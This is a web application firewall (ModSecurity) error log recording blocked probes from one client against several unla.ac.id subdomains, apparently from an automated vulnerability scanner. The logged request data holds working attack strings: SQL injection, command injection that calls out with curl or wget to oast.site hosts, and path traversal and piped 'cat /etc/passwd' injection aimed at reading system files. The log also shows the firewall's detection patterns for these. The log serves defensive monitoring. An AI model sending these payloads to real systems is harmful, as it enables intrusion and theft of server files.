[Tue Aug 29 11:33:14.506841 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARD1T4AAAAH"]
[Tue Aug 29 11:33:14.562610 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARTEMsAAAAG"]
[Tue Aug 29 11:33:14.564002 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAAQKOi8AAAAs"]
[Tue Aug 29 11:33:14.564560 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARYxDcAAAAJ"]
[Tue Aug 29 11:33:14.566648 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARNk9wAAAAS"]
[Tue Aug 29 11:33:14.582838 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARTEMwAAAAG"]
[Tue Aug 29 11:33:14.603713 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARR27oAAAAF"]
[Tue Aug 29 11:33:15.998940 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgzokhgmrz566gw.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11C8Co-f0AAARfwi8AAAAI"]
[Tue Aug 29 11:33:16.345038 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgfgifmtxfcrhoq.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DMCo-f0AAARR28MAAAAF"]
[Tue Aug 29 11:33:17.990087 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgd9qxe5w3gs67s.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DcCo-f0AAARo8wcAAAAT"]
[Tue Aug 29 11:33:18.355165 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgdgjer8yo9t84c.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DsCo-f0AAARo8wkAAAAT"]
[Tue Aug 29 11:33:18.380193 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgpsdjysumdmhmx.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DsCo-f0AAARo8woAAAAT"]
[Tue Aug 29 11:33:18.681424 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlgtqkamh7rrsgpt.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAAQKOjoAAAAs"]
[Tue Aug 29 11:33:18.701327 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlg7jdomdnxfipno.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAAQKOjsAAAAs"]
[Tue Aug 29 11:33:18.716668 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlge8gd6d7jwzqaj.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARnmH0AAAAR"]
[Tue Aug 29 11:33:18.720370 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlg8ou8zgd35d67k.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAAQKOjwAAAAs"]
[Tue Aug 29 11:33:18.735320 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlg83ogmpyd974wn.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARdiHsAAAAK"]
[Tue Aug 29 11:33:18.779613 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlgzrohb95qs1rpx.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARnmIAAAAAR"]
[Tue Aug 29 11:33:18.909199 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARpgwoAAAAU"]
[Tue Aug 29 11:33:18.929571 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARpgwsAAAAU"]
[Tue Aug 29 11:33:18.949116 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARpgwwAAAAU"]
[Tue Aug 29 11:33:18.965968 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARQ38UAAAAB"]
[Tue Aug 29 11:33:18.999939 2023] [:error] [pid 1136] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARwuq4AAAAZ"]
[Tue Aug 29 11:33:19.000525 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlg54r7wpwbonf9g.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DsCo-f0AAARv7O8AAAAY"]
[Tue Aug 29 11:33:19.009048 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARpgw8AAAAU"]
[Tue Aug 29 11:33:19.028138 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARpgxAAAAAU"]
[Tue Aug 29 11:33:19.047739 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARxOpYAAAAa"]
[Tue Aug 29 11:33:19.048093 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARQ38kAAAAB"]
[Tue Aug 29 11:33:19.051574 2023] [:error] [pid 1142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAAR2Z2sAAAAe"]
[Tue Aug 29 11:33:19.056500 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARzXwQAAAAd"]
[Tue Aug 29 11:33:19.060975 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11D8Co-f0AAARt-8EAAAAV"]
[Tue Aug 29 11:33:19.070940 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARQ38oAAAAB"]
[Tue Aug 29 11:33:19.302886 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARfwjIAAAAI"]
[Tue Aug 29 11:33:19.316857 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARxOpkAAAAa"]
